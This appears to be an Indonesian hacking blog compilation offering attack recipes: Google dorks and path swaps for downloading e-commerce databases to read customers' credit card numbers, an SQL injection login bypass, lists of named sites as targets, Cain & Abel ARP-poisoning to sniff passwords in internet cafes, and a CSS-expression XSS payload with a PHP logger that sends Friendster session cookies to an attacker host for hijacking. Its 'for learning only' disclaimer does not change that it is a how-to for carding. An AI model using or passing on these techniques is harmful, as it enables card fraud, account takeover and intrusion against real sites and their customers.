Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : http://www.Target.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi

Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log

Contoh bugs pada bentuk toko sistem :Proddetail.asp

Ketik keyword google.com : allinurl [Stick Out Tongue] roddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : http://www.Target.org/fpdb/vsproducts.mdb
Contoh bugs pada bentuk toko sistem [Big Grin] igishop

Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

setelah bisa login, cari data yang diperlukan .

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca

Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

Contoh bugs pada bentuk toko sistem : Index cart

Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example http://www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : http://www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : http://www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : http://www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??

Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya http://www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..

Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’

Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin

Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page – Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment

————————————————————————————————–

silahkan di pelajari…….

ingat,

artikel ni cman bwt pelajaran,,

segala akibat yang terjadi akibat penyalahgunaan artikel ini
diluar tanggung jawab saya..


ikuti langkah2 berikut ini :
1.buka command prompt/cmd anda, caranya klik start > run > cmd
2.Saat command prompt anda muncul, ketik edit iseng.bat
3.Maka tampilan command prompt anda akan berbeda. setelah itu

masukkan/ketikkan code di bawah ini :
net send [ipkomputer]/[namakomputer] pesan anda
contoh :
net send 192.168.101.7 sorry ya kompi lagi capek restart dulu ya

call iseng.bat

kemudian save as file tersebut.

Untuk menjalankannya tinggal klik file iseng.bat tersebut

Keterangan dan tips :

  • iseng.bat adalah nama file bisa diganti dengan nama lain misalnya coba.bat, kucing.bat dll.
  • Saat menyimpan file pada menu cmd, perhatikan huruf yang dicetak berbeda dengan huruf lainnya:
  • File : huruf F dicetak berbeda, maksudnya untuk mengakses menu file kita harus menekan tombol F.
  • Hal tersebut juga berlaku pada menu menu lainnnya.
  • Untuk berpindah ke area ketikan lain gunakan tombol tab.

Cara ini menggunakan program cain abel. Sebenarnya bukan hanya password friendster saja yang dapat dibobol dengan program ini. Semua website yang memiliki fasilitas login dapat dibobol dengan program ini kecuali jika website tersebut menggunakan ssl yang ditandai dengan tanda gembok yang muncul pada browser saat kita akan melakukan login. Website yang menggunakan ssl diantaranya yahoomail, gmail, rapidshare dll. To the point aja dah ikuti cara berikut :

1. Download program cain abel DISINI
2. Install program, tinggal next next OK aja.
3. Nah skarang buka programnya.
4. Klik configure klik di tab sniffer adapter yang aktif, bisanya klo aktif ada IP adress misalnya 192.168.0.1. Trs klik OK.

5. Skrg klik tab sniffer, lalu klik pada bagian bawah program pada icon host yg ak tandai dengan warna merah , lalu klik tanda + yg ak tandai dengan warna biru di bagian atas, nanti akan muncul tampilan seperti di gambar.

6. Klik pada opsi “All Host In My Subnet” dan “All Test”.
10. Klik pada tab APR, lalu klik tanda +, muncul tampilan baru , pada bagian kiri pilih IP target, bagian kanan klik ip yang paling atas trs OK. Saran saya sih ip targetnya diklik smua aja tapi klikna harus satu2 gak bisa langsung.
7. Skrg aktifkan sniffer dengan cara klik pada icon start/stop sniffer yg ak tandai warna hijau.
8. Skrg klik pada tab password yg ak tandai dengan warna kuning.
9. Cari yang http lalu klik, nah sekarang anda tinggal menunggu beberapa saat.

Sekedar mengingatkan trik ini pada sebagian kecil warnet dapat merusak billing dan juga dapat membuat koneksi internet mengalami gangguan. Saat saya coba di 2 warnet, pengunjungnya pada pulang gara gara koneksinya putus, dan pada salah satu warnet billing operatornya rusak.


Mau tau cara hack password friendster orang ?? tapi syaratnya agak susah nie lo copy paste aja word di bawah ini!!!!

syarat :

1. Punya FS (tentunya)
2. Punya sites, buat yg gratisan yg support script PHP untuk melihat/eksekusi
cookie yag sudah kita tanam
3. gunakan mozilla
langkah-langkah :

1. login FS
2. masuk ke profile–>edit profile–>customize
3. paste code berikut di bagian CSS (Upload an image with PhotoBucket) untuk
menjalankan javascript
(penempatan bisa dimana saja, atas/bawah)

naon_wae_lah(apa aja lah) {
height :
expr/**/ession(document.location=’http:///.php?kukis=’+document.cookie)
}

a. yoursite=site yg dah dibikn pake situs gratisan (lihat syarat no 2), contoh :
http://www.evil-site.com
b. yourfile=file untuk menanam cookies pada situs gratisan (lihat a), contoh:
cook.php

4. buat file cook.php(lihat b)

——————————————————————–

{?php
$kokis = $HTTP_GET_VARS[’kukis’];
$filename = “cok.log”;

‘// metoda dengan append append

$handle = fopen($filename, ‘a’);
fwrite($handle, $kokis);

fClose($handle);
‘// redirect-in ke punya tmn lo
echo “{script}document.location=’http://www.friendster.com’;{/script}”;

?}

——————————————————————–
Jangan lupa rubah tanda ‘{’ jadi ‘< ’ dan ‘}’ jadi ‘>’
tanpa tanda curek.

trus kl dah gt, ngpain ? kacape-kacape.
hmmmmm, ….., ya udah cma gt doang
cari target tmn lo. ( pasang foto yg agk cakepan dikit… hehehehee, buat
mancing doang)
biarkan tmn lo buka profile lo.

ya, memang profile lo gk da bs dbuka, tp liat di
http:////cok.log
Huh…..Panen gk ya…!!!, ya gmn muka see…. he..he..he
dah dulu ah, ….so boreddddddddddddddddd……….!!!
eh bentar dulu mo kmana..!!!.
trus kl dah panen gmn ?

nynt dunk..
cari aja nama cookies “friendster_auth=uid” di
http:////cok.log
nama cookies yg laen sprt: friendster_auth=deleted,friendster_pusit_auth=uid
abaikan saja

contoh hasil panen :
friendster_auth=uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*

trus di apain ?
Buka pake notepad aja :
C D ocuments And SettingsAdministratorApplication
DataMozillaFirefoxProfiles.defaultcookies.txt

replace karakter ascii “=” dengan %3D
replace karakter ascii “?” dengan %26
replace karakter ascii “*” dengan %2A

Trus ?
trus, trus mulu ky tukng parkir….heheheh
hapus semua var Cookie, trus isikan text dibawah ini

.www.friendster.com True / False XXXXXX friendster_
auth uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac

%3DODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk2A

Close smua browser, buka mozilla,……
trus………., ya lihat disamping kanan “LOGOUT” N Foto victim cakep bukan
????////